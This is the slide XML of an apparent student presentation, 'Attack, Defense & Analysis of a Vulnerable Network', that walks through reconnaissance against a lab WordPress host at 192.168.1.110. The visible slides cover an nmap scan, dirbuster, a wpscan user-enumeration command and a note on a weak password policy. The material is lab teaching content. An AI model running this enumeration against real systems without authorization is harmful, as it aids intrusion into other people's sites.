          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Google Shape;44;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2498" l="0" r="0" t="2489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="366508"/>
            <a:ext cx="11460479" cy="6124989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;45;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365767" y="2784634"/>
            <a:ext cx="11460434" cy="1056450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="9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algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;46;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11409045" y="6333135"/>
            <a:ext cx="731591" cy="524850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0"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1pPr>
            <a:lvl2pPr indent="0" lvl="1"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2pPr>
            <a:lvl3pPr indent="0" lvl="2"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3pPr>
            <a:lvl4pPr indent="0" lvl="3"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4pPr>
            <a:lvl5pPr indent="0" lvl="4"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5pPr>
            <a:lvl6pPr indent="0" lvl="5"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6pPr>
            <a:lvl7pPr indent="0" lvl="6"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7pPr>
            <a:lvl8pPr indent="0" lvl="7"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8pPr>
            <a:lvl9pPr indent="0" lvl="8" marL="0" marR="0" algn="l">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="185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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349141" cy="140850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0"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0" lvl="1"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0" lvl="2"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0" lvl="3"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0" lvl="4"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0" lvl="5"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0" lvl="6"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0" lvl="7"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0" lvl="8" marL="0" marR="0" algn="l">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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16400" y="6555534"/>
            <a:ext cx="10629218" cy="302400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="731350" spcFirstLastPara="1" rIns="0" wrap="square" tIns="121850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buNone/>
              <a:defRPr sz="950"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="1850"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buNone/>
              <a:defRPr sz="185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2" name="Google Shape;5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4" name="Google Shape;64;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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367276" y="2530434"/>
            <a:ext cx="11457450" cy="105645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9600"/>
              <a:buFont typeface="Arial"/>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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Attack, Defense &amp; Analysis of a Vulnerable Network</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>By Derek Shashek, K Washington, and Tesse McNair</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p1"/>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28" name="Google Shape;128;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14808" y="6555534"/>
            <a:ext cx="10626450" cy="302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6"/>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195" name="Google Shape;195;p6"/>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196" name="Google Shape;196;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367259" y="2468134"/>
            <a:ext cx="11457450" cy="13728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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits Used</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-42123" y="17481422"/>
            <a:ext cx="28329749" cy="806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nmap Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p7"/>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04" name="Google Shape;204;p7"/>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114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assuming we knew nothing about this machine, we would perform an nmap scan to find open ports and services.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Here we can see that the target is running an apache web server.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="Google Shape;205;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2199800" y="3042625"/>
            <a:ext cx="7696750" cy="261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nmap Scan (cont’d)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p8"/>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12" name="Google Shape;212;p8"/>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114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In most wordpress sites, we could determine that the site was built on wordpress by examining the source files with the developer tools in our browser.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If it is not clear from the information available in the browser, tools such as nmap and dirbuster can be used to discover the subdomains on a server which will give us more information.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="213" name="Google Shape;213;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571850" y="3535925"/>
            <a:ext cx="3182600" cy="2279425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="214" name="Google Shape;214;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4197506" y="3162975"/>
            <a:ext cx="7046563" cy="302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9"/>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wpscan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p9"/>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21" name="Google Shape;221;p9"/>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114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To obtain the usernames on the server, we can use wpscan.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpscan --url 192.168.1.110/wordpress --enumerate u</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Google Shape;222;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330888" y="2218113"/>
            <a:ext cx="7928775" cy="279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14771" y="2520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Weak Password Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;p10"/>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29" name="Google Shape;229;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471400" cy="4933200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1218975" lIns="609500" spcFirstLastPara="1" rIns="609500" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There appears to be no restriction of any kind on the passwords allowed by this system.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
